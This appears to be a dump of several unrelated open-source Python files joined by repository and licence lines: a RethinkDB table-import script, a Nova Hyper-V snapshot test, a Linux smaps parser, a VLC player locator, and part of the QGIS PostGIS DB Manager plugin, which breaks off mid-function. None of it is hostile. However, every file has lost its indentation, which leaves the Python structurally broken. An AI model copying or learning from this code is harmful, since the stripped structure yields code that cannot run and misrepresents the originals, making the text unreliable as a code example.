# Make sure only remaining data is whitespace
while len(json_data) > 0:
if json.decoder.WHITESPACE.match(json_data, 0).end() != len(json_data):
raise RuntimeError("Error: JSON format not recognized - extra characters found after end of data")
json_data = file_in.read(json_read_chunk_size)
progress_info[0].value = progress_info[1].value
if len(object_buffers) > 0:
task_queue.put((db, table, object_buffers))
# Wrapper classes for the handling of unicode csv files
# Taken from https://docs.python.org/2/library/csv.html
class Utf8Recoder:
def __init__(self, f):
self.reader = codecs.getreader('utf-8')(f)
def __iter__(self):
return self
def next(self):
return self.reader.next().encode("utf-8")
class Utf8CsvReader:
def __init__(self, f, **kwargs):
f = Utf8Recoder(f)
self.reader = csv.reader(f, **kwargs)
self.line_num = self.reader.line_num
def next(self):
row = self.reader.next()
self.line_num = self.reader.line_num
return [unicode(s, 'utf-8') for s in row]
def __iter__(self):
return self
def open_csv_file(filename):
if PY3:
return open(filename, 'r', encoding='utf-8', newline='')
else:
return open(filename, 'r')
def csv_reader(task_queue, filename, db, table, options, progress_info, exit_event):
object_buffers = []
buffer_sizes = []
# Count the lines so we can report progress
# TODO: this requires us to make two passes on csv files
line_count = 0
with open_csv_file(filename) as file_in:
# count rows; line_count stays 0 for an empty file (avoids an unbound loop variable)
for line_count, _line in enumerate(file_in, start=1):
pass
progress_info[1].value = line_count
with open_csv_file(filename) as file_in:
if PY3:
reader = csv.reader(file_in, delimiter=options["delimiter"])
else:
reader = Utf8CsvReader(file_in, delimiter=options["delimiter"])
if not options["no_header"]:
fields_in = next(reader)
# Field names may override fields from the header
if options["custom_header"] is not None:
if not options["no_header"]:
print("Ignoring header row: %s" % str(fields_in))
fields_in = options["custom_header"]
elif options["no_header"]:
raise RuntimeError("Error: No field name information available")
for row in reader:
file_line = reader.line_num
progress_info[0].value = file_line
if len(fields_in) != len(row):
raise RuntimeError("Error: File '%s' line %d has an inconsistent number of columns" % (filename, file_line))
# We import all csv fields as strings (since we can't assume the type of the data)
obj = dict(zip(fields_in, row))
for key in list(obj.keys()): # Treat empty fields as no entry rather than empty string
if len(obj[key]) == 0:
del obj[key]
object_callback(obj, db, table, task_queue, object_buffers, buffer_sizes, options["fields"], exit_event)
if len(object_buffers) > 0:
task_queue.put((db, table, object_buffers))
# This function is called through rdb_call_wrapper, which will reattempt if a connection
# error occurs. Progress will resume where it left off.
def create_table(progress, conn, db, table, pkey, sindexes):
if table not in r.db(db).table_list().run(conn):
r.db(db).table_create(table, primary_key=pkey).run(conn)
if progress[0] is None:
progress[0] = 0
# Recreate secondary indexes - assume that any indexes that already exist are wrong
# and create them from scratch
indexes = r.db(db).table(table).index_list().run(conn)
created_indexes = list()
for sindex in sindexes[progress[0]:]:
if isinstance(sindex, dict) and all(k in sindex for k in ('index', 'function')):
if sindex['index'] in indexes:
r.db(db).table(table).index_drop(sindex['index']).run(conn)
r.db(db).table(table).index_create(sindex['index'], sindex['function']).run(conn)
created_indexes.append(sindex['index'])
progress[0] += 1
r.db(db).table(table).index_wait(r.args(created_indexes)).run(conn)
def table_reader(options, file_info, task_queue, error_queue, progress_info, exit_event):
try:
db = file_info["db"]
table = file_info["table"]
primary_key = file_info["info"]["primary_key"]
conn_fn = lambda: r.connect(options["host"], options["port"], auth_key=options["auth_key"])
rdb_call_wrapper(conn_fn, "create table", create_table, db, table, primary_key,
file_info["info"]["indexes"] if options["create_sindexes"] else [])
if file_info["format"] == "json":
json_reader(task_queue,
file_info["file"],
db, table,
options["fields"],
progress_info,
exit_event)
elif file_info["format"] == "csv":
csv_reader(task_queue,
file_info["file"],
db, table,
options,
progress_info,
exit_event)
else:
raise RuntimeError("Error: Unknown file format specified")
except InterruptedError:
pass # Don't save interrupted errors, they are side-effects
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb), file_info["file"]))
def abort_import(signum, frame, parent_pid, exit_event, task_queue, clients, interrupt_event):
# Only do the abort from the parent process
if os.getpid() == parent_pid:
interrupt_event.set()
exit_event.set()
def print_progress(ratio):
total_width = 40
done_width = int(ratio * total_width)
undone_width = total_width - done_width
print("\r[%s%s] %3d%%" % ("=" * done_width, " " * undone_width, int(100 * ratio)), end=' ')
sys.stdout.flush()
def update_progress(progress_info):
lowest_completion = 1.0
for current, max_count in progress_info:
curr_val = current.value
max_val = max_count.value
if curr_val < 0:
lowest_completion = 0.0
elif max_val <= 0:
lowest_completion = 1.0
else:
lowest_completion = min(lowest_completion, float(curr_val) / max_val)
print_progress(lowest_completion)
def spawn_import_clients(options, files_info):
# Spawn one reader process for each db.table, as well as many client processes
task_queue = SimpleQueue()
error_queue = SimpleQueue()
exit_event = multiprocessing.Event()
interrupt_event = multiprocessing.Event()
errors = []
reader_procs = []
client_procs = []
parent_pid = os.getpid()
signal.signal(signal.SIGINT, lambda a, b: abort_import(a, b, parent_pid, exit_event, task_queue, client_procs, interrupt_event))
try:
progress_info = []
rows_written = multiprocessing.Value(ctypes.c_longlong, 0)
for i in xrange(options["clients"]):
client_procs.append(multiprocessing.Process(target=client_process,
args=(options["host"],
options["port"],
options["auth_key"],
task_queue,
error_queue,
rows_written,
options["force"],
options["durability"])))
client_procs[-1].start()
for file_info in files_info:
progress_info.append((multiprocessing.Value(ctypes.c_longlong, -1), # Current lines/bytes processed
multiprocessing.Value(ctypes.c_longlong, 0))) # Total lines/bytes to process
reader_procs.append(multiprocessing.Process(target=table_reader,
args=(options,
file_info,
task_queue,
error_queue,
progress_info[-1],
exit_event)))
reader_procs[-1].start()
# Wait for all reader processes to finish - hooray, polling
while len(reader_procs) > 0:
time.sleep(0.1)
# If an error has occurred, exit out early
while not error_queue.empty():
exit_event.set()
errors.append(error_queue.get())
reader_procs = [proc for proc in reader_procs if proc.is_alive()]
update_progress(progress_info)
# Wait for all clients to finish
alive_clients = sum([client.is_alive() for client in client_procs])
for i in xrange(alive_clients):
task_queue.put(StopIteration())
while len(client_procs) > 0:
time.sleep(0.1)
client_procs = [client for client in client_procs if client.is_alive()]
# If we were successful, make sure 100% progress is reported
if len(errors) == 0 and not interrupt_event.is_set():
print_progress(1.0)
def plural(num, text):
return "%d %s%s" % (num, text, "" if num == 1 else "s")
# Continue past the progress output line
print("")
print("%s imported in %s" % (plural(rows_written.value, "row"),
plural(len(files_info), "table")))
finally:
signal.signal(signal.SIGINT, signal.SIG_DFL)
if interrupt_event.is_set():
raise RuntimeError("Interrupted")
if len(errors) != 0:
# multiprocessing queues don't handle tracebacks, so they've already been stringified in the queue
for error in errors:
print("%s" % error[1], file=sys.stderr)
if options["debug"]:
print("%s traceback: %s" % (error[0].__name__, error[2]), file=sys.stderr)
if len(error) == 4:
print("In file: %s" % error[3], file=sys.stderr)
raise RuntimeError("Errors occurred during import")
def get_import_info_for_file(filename, db_table_filter):
file_info = {}
file_info["file"] = filename
file_info["format"] = os.path.split(filename)[1].split(".")[-1]
file_info["db"] = os.path.split(os.path.split(filename)[0])[1]
file_info["table"] = os.path.split(filename)[1].split(".")[0]
if len(db_table_filter) > 0:
if (file_info["db"], None) not in db_table_filter:
if (file_info["db"], file_info["table"]) not in db_table_filter:
return None
info_filepath = os.path.join(os.path.split(filename)[0], file_info["table"] + ".info")
with open(info_filepath, "r") as info_file:
file_info["info"] = json.load(info_file)
return file_info
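# Illustrative note (an assumption matching how get_import_info_for_file splits
# paths): a directory produced by `rethinkdb export` is expected to look like
#     export_dir/
#         test/              <- database name
#             history.json   <- table data (json or csv)
#             history.info   <- table metadata (primary key, secondary indexes)
# so get_import_info_for_file("export_dir/test/history.json", []) would yield
# {"file": ..., "format": "json", "db": "test", "table": "history", "info": {...}}.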
def tables_check(progress, conn, files_info, force):
# Ensure that all needed databases exist and tables don't
db_list = r.db_list().run(conn)
for db in set([file_info["db"] for file_info in files_info]):
if db == "rethinkdb":
raise RuntimeError("Error: Cannot import tables into the system database: 'rethinkdb'")
if db not in db_list:
r.db_create(db).run(conn)
# Ensure that all tables do not exist (unless --forced)
already_exist = []
for file_info in files_info:
table = file_info["table"]
db = file_info["db"]
if table in r.db(db).table_list().run(conn):
if not force:
already_exist.append("%s.%s" % (db, table))
extant_pkey = r.db(db).table(table).info().run(conn)["primary_key"]
if file_info["info"]["primary_key"] != extant_pkey:
raise RuntimeError("Error: Table '%s.%s' already exists with a different primary key" % (db, table))
return already_exist
def import_directory(options):
# Scan for all files, make sure no duplicated tables with different formats
dbs = False
db_filter = set([db_table[0] for db_table in options["db_tables"]])
files_to_import = []
files_ignored = []
for root, dirs, files in os.walk(options["directory"]):
if not dbs:
files_ignored.extend([os.path.join(root, f) for f in files])
# The first iteration through should be the top-level directory, which contains the db folders
dbs = True
if len(db_filter) > 0:
for i in reversed(xrange(len(dirs))):
if dirs[i] not in db_filter:
del dirs[i]
else:
if len(dirs) != 0:
files_ignored.extend([os.path.join(root, d) for d in dirs])
del dirs[0:len(dirs)]
for f in files:
split_file = f.split(".")
if len(split_file) != 2 or split_file[1] not in ["json", "csv", "info"]:
files_ignored.append(os.path.join(root, f))
elif split_file[1] == "info":
pass # Info files are included based on the data files
elif not os.access(os.path.join(root, split_file[0] + ".info"), os.F_OK):
files_ignored.append(os.path.join(root, f))
else:
files_to_import.append(os.path.join(root, f))
# For each table to import collect: file, format, db, table, info
files_info = []
for filename in files_to_import:
res = get_import_info_for_file(filename, options["db_tables"])
if res is not None:
files_info.append(res)
# Ensure no two files are for the same db/table, and that all formats are recognized
db_tables = set()
for file_info in files_info:
if (file_info["db"], file_info["table"]) in db_tables:
raise RuntimeError("Error: Duplicate db.table found in directory tree: %s.%s" % (file_info["db"], file_info["table"]))
if file_info["format"] not in ["csv", "json"]:
raise RuntimeError("Error: Unrecognized format for file %s" % file_info["file"])
db_tables.add((file_info["db"], file_info["table"]))
conn_fn = lambda: r.connect(options["host"], options["port"], auth_key=options["auth_key"])
# Make sure this isn't a pre-`reql_admin` cluster - which could result in data loss
# if the user has a database named 'rethinkdb'
rdb_call_wrapper(conn_fn, "version check", check_minimum_version, (1, 16, 0))
already_exist = rdb_call_wrapper(conn_fn, "tables check", tables_check, files_info, options["force"])
if len(already_exist) == 1:
raise RuntimeError("Error: Table '%s' already exists, run with --force to import into the existing table" % already_exist[0])
elif len(already_exist) > 1:
already_exist.sort()
extant_tables = "\n ".join(already_exist)
raise RuntimeError("Error: The following tables already exist, run with --force to import into the existing tables:\n %s" % extant_tables)
# Warn the user about the files that were ignored
if len(files_ignored) > 0:
print("Unexpected files found in the specified directory. Importing a directory expects", file=sys.stderr)
print(" a directory from `rethinkdb export`. If you want to import individual tables", file=sys.stderr)
print(" import them as single files. The following files were ignored:", file=sys.stderr)
for f in files_ignored:
print("%s" % str(f), file=sys.stderr)
spawn_import_clients(options, files_info)
def table_check(progress, conn, db, table, pkey, force):
if db == "rethinkdb":
raise RuntimeError("Error: Cannot import a table into the system database: 'rethinkdb'")
if db not in r.db_list().run(conn):
r.db_create(db).run(conn)
if table in r.db(db).table_list().run(conn):
if not force:
raise RuntimeError("Error: Table already exists, run with --force if you want to import into the existing table")
extant_pkey = r.db(db).table(table).info().run(conn)["primary_key"]
if pkey is not None and pkey != extant_pkey:
raise RuntimeError("Error: Table already exists with a different primary key")
pkey = extant_pkey
else:
if pkey is None:
print("no primary key specified, using default primary key when creating table")
r.db(db).table_create(table).run(conn)
else:
r.db(db).table_create(table, primary_key=pkey).run(conn)
return pkey
def import_file(options):
db = options["import_db_table"][0]
table = options["import_db_table"][1]
pkey = options["primary_key"]
# Ensure that the database and table exist with the right primary key
conn_fn = lambda: r.connect(options["host"], options["port"], auth_key=options["auth_key"])
# Make sure this isn't a pre-`reql_admin` cluster - which could result in data loss
# if the user has a database named 'rethinkdb'
rdb_call_wrapper(conn_fn, "version check", check_minimum_version, (1, 16, 0))
pkey = rdb_call_wrapper(conn_fn, "table check", table_check, db, table, pkey, options["force"])
# Make this up so we can use the same interface as with an import directory
file_info = {}
file_info["file"] = options["import_file"]
file_info["format"] = options["import_format"]
file_info["db"] = db
file_info["table"] = table
file_info["info"] = {"primary_key": pkey, "indexes": []}
spawn_import_clients(options, [file_info])
def main():
try:
options = parse_options()
except RuntimeError as ex:
print("Usage:\n%s" % usage, file=sys.stderr)
print(ex, file=sys.stderr)
return 1
try:
start_time = time.time()
if "directory" in options:
import_directory(options)
elif "import_file" in options:
import_file(options)
else:
raise RuntimeError("Error: Neither --directory or --file specified")
except RuntimeError as ex:
print(ex, file=sys.stderr)
return 1
print(" Done (%d seconds)" % (time.time() - start_time))
return 0
if __name__ == "__main__":
exit(main())
| agpl-3.0 |
watonyweng/nova | nova/tests/unit/virt/hyperv/test_snapshotops.py | 67 | 5891 | # Copyright 2014 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from nova.compute import task_states
from nova.tests.unit import fake_instance
from nova.tests.unit.virt.hyperv import test_base
from nova.virt.hyperv import snapshotops
class SnapshotOpsTestCase(test_base.HyperVBaseTestCase):
"""Unit tests for the Hyper-V SnapshotOps class."""
def setUp(self):
super(SnapshotOpsTestCase, self).setUp()
self.context = 'fake_context'
self._snapshotops = snapshotops.SnapshotOps()
self._snapshotops._pathutils = mock.MagicMock()
self._snapshotops._vmutils = mock.MagicMock()
self._snapshotops._vhdutils = mock.MagicMock()
@mock.patch('nova.image.glance.get_remote_image_service')
def test_save_glance_image(self, mock_get_remote_image_service):
image_metadata = {"is_public": False,
"disk_format": "vhd",
"container_format": "bare",
"properties": {}}
glance_image_service = mock.MagicMock()
mock_get_remote_image_service.return_value = (glance_image_service,
mock.sentinel.IMAGE_ID)
self._snapshotops._save_glance_image(context=self.context,
image_id=mock.sentinel.IMAGE_ID,
image_vhd_path=mock.sentinel.PATH)
mock_get_remote_image_service.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID)
self._snapshotops._pathutils.open.assert_called_with(
mock.sentinel.PATH, 'rb')
glance_image_service.update.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID, image_metadata,
self._snapshotops._pathutils.open().__enter__())
@mock.patch('nova.virt.hyperv.snapshotops.SnapshotOps._save_glance_image')
def _test_snapshot(self, mock_save_glance_image, base_disk_path):
mock_instance = fake_instance.fake_instance_obj(self.context)
mock_update = mock.MagicMock()
fake_src_path = os.path.join('fake', 'path')
self._snapshotops._pathutils.lookup_root_vhd_path.return_value = (
fake_src_path)
fake_exp_dir = os.path.join(os.path.join('fake', 'exp'), 'dir')
self._snapshotops._pathutils.get_export_dir.return_value = fake_exp_dir
self._snapshotops._vhdutils.get_vhd_parent_path.return_value = (
base_disk_path)
fake_snapshot_path = (
self._snapshotops._vmutils.take_vm_snapshot.return_value)
self._snapshotops.snapshot(context=self.context,
instance=mock_instance,
image_id=mock.sentinel.IMAGE_ID,
update_task_state=mock_update)
self._snapshotops._vmutils.take_vm_snapshot.assert_called_once_with(
mock_instance.name)
mock_lookup_path = self._snapshotops._pathutils.lookup_root_vhd_path
mock_lookup_path.assert_called_once_with(mock_instance.name)
mock_get_vhd_path = self._snapshotops._vhdutils.get_vhd_parent_path
mock_get_vhd_path.assert_called_once_with(fake_src_path)
self._snapshotops._pathutils.get_export_dir.assert_called_once_with(
mock_instance.name)
expected = [mock.call(fake_src_path,
os.path.join(fake_exp_dir,
os.path.basename(fake_src_path)))]
dest_vhd_path = os.path.join(fake_exp_dir,
os.path.basename(fake_src_path))
if base_disk_path:
basename = os.path.basename(base_disk_path)
base_dest_disk_path = os.path.join(fake_exp_dir, basename)
expected.append(mock.call(base_disk_path, base_dest_disk_path))
mock_reconnect = self._snapshotops._vhdutils.reconnect_parent_vhd
mock_reconnect.assert_called_once_with(dest_vhd_path,
base_dest_disk_path)
self._snapshotops._vhdutils.merge_vhd.assert_called_once_with(
dest_vhd_path, base_dest_disk_path)
mock_save_glance_image.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID, base_dest_disk_path)
else:
mock_save_glance_image.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID, dest_vhd_path)
self._snapshotops._pathutils.copyfile.has_calls(expected)
expected_update = [
mock.call(task_state=task_states.IMAGE_PENDING_UPLOAD),
mock.call(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)]
mock_update.has_calls(expected_update)
self._snapshotops._vmutils.remove_vm_snapshot.assert_called_once_with(
fake_snapshot_path)
self._snapshotops._pathutils.rmtree.assert_called_once_with(
fake_exp_dir)
def test_snapshot(self):
base_disk_path = os.path.join('fake', 'disk')
self._test_snapshot(base_disk_path=base_disk_path)
def test_snapshot_no_base_disk(self):
self._test_snapshot(base_disk_path=None)
| apache-2.0 |
darrengarvey/procfs-snapshot | parsers/smaps.py | 1 | 3160 | from model import MemoryRegion
import util
import re
def parse_smaps_header(header):
info = MemoryRegion(free=False)
# Example line is:
# 011e6000-01239000 rw-p 00000000 00:00 0 [heap]
# 8ec00000-8ec01000 rw-s 00000000 00:14 20 /dev/shm/NS2371 (deleted)
# All numbers are hex except for the inode
parts = header.split()
util.LOGGER.debug('Parsing smaps header %s' % header)
# Parse the address range
info.start_addr, info.end_addr = [long(x, 16) for x in parts[0].split('-')]
# Parse the permissions
permissions = parts[1]
info.permissions.readable = "r" in permissions
info.permissions.writable = "w" in permissions
info.permissions.executable = "x" in permissions
info.permissions.private = "p" in permissions
info.permissions.shared = "s" in permissions
info.offset = long(parts[2], 16)
# eg. 08:06
info.major_dev, info.minor_dev = [int(x, 16) for x in parts[3].split(':')]
# The inode isn't a hex number
info.inode = int(parts[4])
# eg. [heap]
# or /dev/shm/NS2371
if len(parts) > 5:
info.name = parts[5]
info.deleted = header.endswith('(deleted)')
return info
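# Illustrative example (values derived from the sample header in the comments
# above; not part of the original module):
#   info = parse_smaps_header(
#       "011e6000-01239000 rw-p 00000000 00:00 0 [heap]")
#   # info.start_addr == 0x011e6000, info.end_addr == 0x01239000
#   # info.permissions.readable and info.permissions.writable are True
#   # info.major_dev == 0, info.minor_dev == 0, info.inode == 0
#   # info.name == "[heap]", info.deleted is False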
_header_re = re.compile('^[0-9a-zA-Z]+-[0-9a-zA-Z]+ .*')
def is_memory_region_header(line):
return re.match(_header_re, line)
def parse_smaps_memory_region(pid, lines, has_header=True):
"""Parse a whole smaps region, which may look like:
7f5c8550e000-7f5c85554000 r--p 00000000 08:06 1309629 /fonts/Arial_Bold.ttf
Size: 280 kB
Rss: 152 kB
Pss: 86 kB
Shared_Clean: 132 kB
Shared_Dirty: 12 kB
Private_Clean: 20 kB
Private_Dirty: 1 kB
Referenced: 152 kB
Anonymous: 2 kB
AnonHugePages: 3 kB
Shared_Hugetlb: 4 kB
Private_Hugetlb: 5 kB
Swap: 6 kB
SwapPss: 7 kB
KernelPageSize: 8 kB
MMUPageSize: 9 kB
Locked: 10 kB
VmFlags: rd mr mw me sd"""
    # Auto-detect whether the first line is a region header, regardless of the
    # has_header argument that was passed in
    has_header = is_memory_region_header(lines[0])
if has_header:
region = parse_smaps_header(lines[0])
if region.name == '[vsyscall]':
return None
lines = lines[1:]
else:
region = MemoryRegion(free=False)
region.pid = pid
global _smaps_string_mappings
for line in lines:
util.LOGGER.debug('Parsing line: %s' % line)
parts = re.split('[ :]+', line.strip())
if len(parts) < 2:
util.LOGGER.debug('Skipping smaps line that is too short: %s' % line)
elif 'Size' == parts[0]:
# We calculate the size from the address ranges instead.
pass
elif 'VmFlags' == parts[0]:
region.vm_flags = parts[1:]
else:
# All other lines should be an amount of some type of memory.
try:
region.__dict__[util.camel_case_to_underscore(parts[0])] = int(parts[1]) * 1024
except KeyError:
util.LOGGER.warn("Line not recognised: '%s'" % line)
return region
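# Illustrative usage (a sketch; the derived attribute names come from
# util.camel_case_to_underscore and are assumed here):
#   lines = ["011e6000-01239000 rw-p 00000000 00:00 0 [heap]",
#            "Rss: 152 kB"]
#   region = parse_smaps_memory_region(1234, lines)
#   # region.pid == 1234 and, assuming "Rss" maps to "rss",
#   # region.rss == 152 * 1024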
| apache-2.0 |
flijloku/livestreamer | src/livestreamer_cli/utils/player.py | 23 | 1244 | import os
import sys
from ..compat import shlex_quote
def check_paths(exes, paths):
for path in paths:
for exe in exes:
path = os.path.expanduser(os.path.join(path, exe))
if os.path.isfile(path):
return path
def find_default_player():
if "darwin" in sys.platform:
paths = os.environ.get("PATH", "").split(":")
paths += ["/Applications/VLC.app/Contents/MacOS/"]
paths += ["~/Applications/VLC.app/Contents/MacOS/"]
path = check_paths(("VLC", "vlc"), paths)
elif "win32" in sys.platform:
exename = "vlc.exe"
paths = os.environ.get("PATH", "").split(";")
path = check_paths((exename,), paths)
if not path:
subpath = "VideoLAN\\VLC\\"
envvars = ("PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMW6432")
paths = filter(None, (os.environ.get(var) for var in envvars))
paths = (os.path.join(p, subpath) for p in paths)
path = check_paths((exename,), paths)
else:
paths = os.environ.get("PATH", "").split(":")
path = check_paths(("vlc",), paths)
if path:
        # Quote the command because the path can contain spaces
return shlex_quote(path)
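# Illustrative usage (assumed; the returned path is already shell-quoted):
#   player = find_default_player()
#   if player:
#       command = "%s --version" % player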
| bsd-2-clause |
dmarteau/QGIS | python/plugins/db_manager/db_plugins/postgis/plugin.py | 25 | 17115 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import str
from builtins import map
from builtins import range
# this will disable the dbplugin if the connector raise an ImportError
from .connector import PostGisDBConnector
from qgis.PyQt.QtCore import Qt, QRegExp, QCoreApplication
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction, QApplication, QMessageBox
from qgis.core import Qgis, QgsApplication, QgsSettings
from qgis.gui import QgsMessageBar
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, Database, Schema, Table, VectorTable, RasterTable, \
TableField, TableConstraint, TableIndex, TableTrigger, TableRule
import re
def classFactory():
return PostGisDBPlugin
class PostGisDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QgsApplication.getThemeIcon("/mIconPostgis.svg")
@classmethod
def typeName(self):
return 'postgis'
@classmethod
def typeNameString(self):
return QCoreApplication.translate('db_manager', 'PostGIS')
@classmethod
def providerName(self):
return 'postgres'
@classmethod
def connectionSettingsKey(self):
return '/PostgreSQL/connections'
def databasesFactory(self, connection, uri):
return PGDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QgsSettings()
settings.beginGroup(u"/%s/%s" % (self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(self.tr('There is no defined database connection "{0}".').format(conn_name))
from qgis.core import QgsDataSourceUri
uri = QgsDataSourceUri()
settingsList = ["service", "host", "port", "database", "username", "password", "authcfg"]
service, host, port, database, username, password, authcfg = [settings.value(x, "", type=str) for x in settingsList]
useEstimatedMetadata = settings.value("estimatedMetadata", False, type=bool)
try:
sslmode = settings.enumValue("sslmode", QgsDataSourceUri.SslPrefer)
except TypeError:
sslmode = QgsDataSourceUri.SslPrefer
settings.endGroup()
if hasattr(authcfg, 'isNull') and authcfg.isNull():
authcfg = ''
if service:
uri.setConnection(service, database, username, password, sslmode, authcfg)
else:
uri.setConnection(host, port, database, username, password, sslmode, authcfg)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
try:
return self.connectToUri(uri)
except ConnectionError:
return False
class PGDatabase(Database):
def __init__(self, connection, uri):
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return PostGisDBConnector(uri, self.connection())
def dataTablesFactory(self, row, db, schema=None):
return PGTable(row, db, schema)
def info(self):
from .info_model import PGDatabaseInfo
return PGDatabaseInfo(self)
def vectorTablesFactory(self, row, db, schema=None):
return PGVectorTable(row, db, schema)
def rasterTablesFactory(self, row, db, schema=None):
return PGRasterTable(row, db, schema)
def schemasFactory(self, row, db):
return PGSchema(row, db)
def sqlResultModel(self, sql, parent):
from .data_model import PGSqlResultModel
return PGSqlResultModel(self, sql, parent)
def sqlResultModelAsync(self, sql, parent):
from .data_model import PGSqlResultModelAsync
return PGSqlResultModelAsync(self, sql, parent)
def registerDatabaseActions(self, mainWindow):
Database.registerDatabaseActions(self, mainWindow)
# add a separator
separator = QAction(self)
separator.setSeparator(True)
mainWindow.registerAction(separator, self.tr("&Table"))
action = QAction(self.tr("Run &Vacuum Analyze"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runVacuumAnalyzeActionSlot)
action = QAction(self.tr("Run &Refresh Materialized View"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runRefreshMaterializedViewSlot)
def runVacuumAnalyzeActionSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, Table) or item.isView:
parent.infoBar.pushMessage(self.tr("Select a table for vacuum analyze."), Qgis.Info,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runVacuumAnalyze()
def runRefreshMaterializedViewSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, PGTable) or item._relationType != 'm':
parent.infoBar.pushMessage(self.tr("Select a materialized view for refresh."), Qgis.Info,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runRefreshMaterializedView()
def hasLowercaseFieldNamesOption(self):
return True
def supportsComment(self):
return True
def executeSql(self, sql):
return self.connector._executeSql(sql)
class PGSchema(Schema):
def __init__(self, row, db):
Schema.__init__(self, db)
self.oid, self.name, self.owner, self.perms, self.comment = row
class PGTable(Table):
def __init__(self, row, db, schema=None):
Table.__init__(self, db, schema)
self.name, schema_name, self._relationType, self.owner, self.estimatedRowCount, self.pages, self.comment = row
self.isView = self._relationType in set(['v', 'm'])
self.estimatedRowCount = int(self.estimatedRowCount)
def runVacuumAnalyze(self):
self.aboutToChange.emit()
self.database().connector.runVacuumAnalyze((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runRefreshMaterializedView(self):
self.aboutToChange.emit()
self.database().connector.runRefreshMaterializedView((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runAction(self, action):
action = str(action)
if action.startswith("vacuumanalyze/"):
if action == "vacuumanalyze/run":
self.runVacuumAnalyze()
return True
elif action.startswith("rule/"):
parts = action.split('/')
rule_name = parts[1]
rule_action = parts[2]
msg = self.tr(u"Do you want to {0} rule {1}?").format(rule_action, rule_name)
QApplication.restoreOverrideCursor()
try:
if QMessageBox.question(None, self.tr("Table rule"), msg,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.No:
return False
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
if rule_action == "delete":
self.aboutToChange.emit()
self.database().connector.deleteTableRule(rule_name, (self.schemaName(), self.name))
self.refreshRules()
return True
elif action.startswith("refreshmaterializedview/"):
if action == "refreshmaterializedview/run":
self.runRefreshMaterializedView()
return True
return Table.runAction(self, action)
def tableFieldsFactory(self, row, table):
return PGTableField(row, table)
def tableConstraintsFactory(self, row, table):
return PGTableConstraint(row, table)
def tableIndexesFactory(self, row, table):
return PGTableIndex(row, table)
def tableTriggersFactory(self, row, table):
return PGTableTrigger(row, table)
def tableRulesFactory(self, row, table):
return PGTableRule(row, table)
def info(self):
from .info_model import PGTableInfo
return PGTableInfo(self)
def crs(self):
return self.database().connector.getCrs(self.srid)
def tableDataModel(self, parent):
from .data_model import PGTableDataModel
return PGTableDataModel(self, parent)
def delete(self):
self.aboutToChange.emit()
if self.isView:
ret = self.database().connector.deleteView((self.schemaName(), self.name), self._relationType == 'm')
else:
ret = self.database().connector.deleteTable((self.schemaName(), self.name))
if not ret:
self.deleted.emit()
return ret
class PGVectorTable(PGTable, VectorTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-4], db, schema)
VectorTable.__init__(self, db, schema)
self.geomColumn, self.geomType, self.geomDim, self.srid = row[-4:]
def info(self):
from .info_model import PGVectorTableInfo
return PGVectorTableInfo(self)
def runAction(self, action):
if PGTable.runAction(self, action):
return True
return VectorTable.runAction(self, action)
class PGRasterTable(PGTable, RasterTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-6], db, schema)
RasterTable.__init__(self, db, schema)
self.geomColumn, self.pixelType, self.pixelSizeX, self.pixelSizeY, self.isExternal, self.srid = row[-6:]
self.geomType = 'RASTER'
def info(self):
from .info_model import PGRasterTableInfo
return PGRasterTableInfo(self)
def uri(self, uri=None):
"""Returns the datasource URI for postgresraster provider"""
if not uri:
uri = self.database().uri()
service = (u'service=\'%s\'' % uri.service()) if uri.service() else ''
dbname = (u'dbname=\'%s\'' % uri.database()) if uri.database() else ''
host = (u'host=%s' % uri.host()) if uri.host() else ''
user = (u'user=%s' % uri.username()) if uri.username() else ''
passw = (u'password=%s' % uri.password()) if uri.password() else ''
port = (u'port=%s' % uri.port()) if uri.port() else ''
schema = self.schemaName() if self.schemaName() else 'public'
table = '"%s"."%s"' % (schema, self.name)
if not dbname:
# postgresraster provider *requires* a dbname
connector = self.database().connector
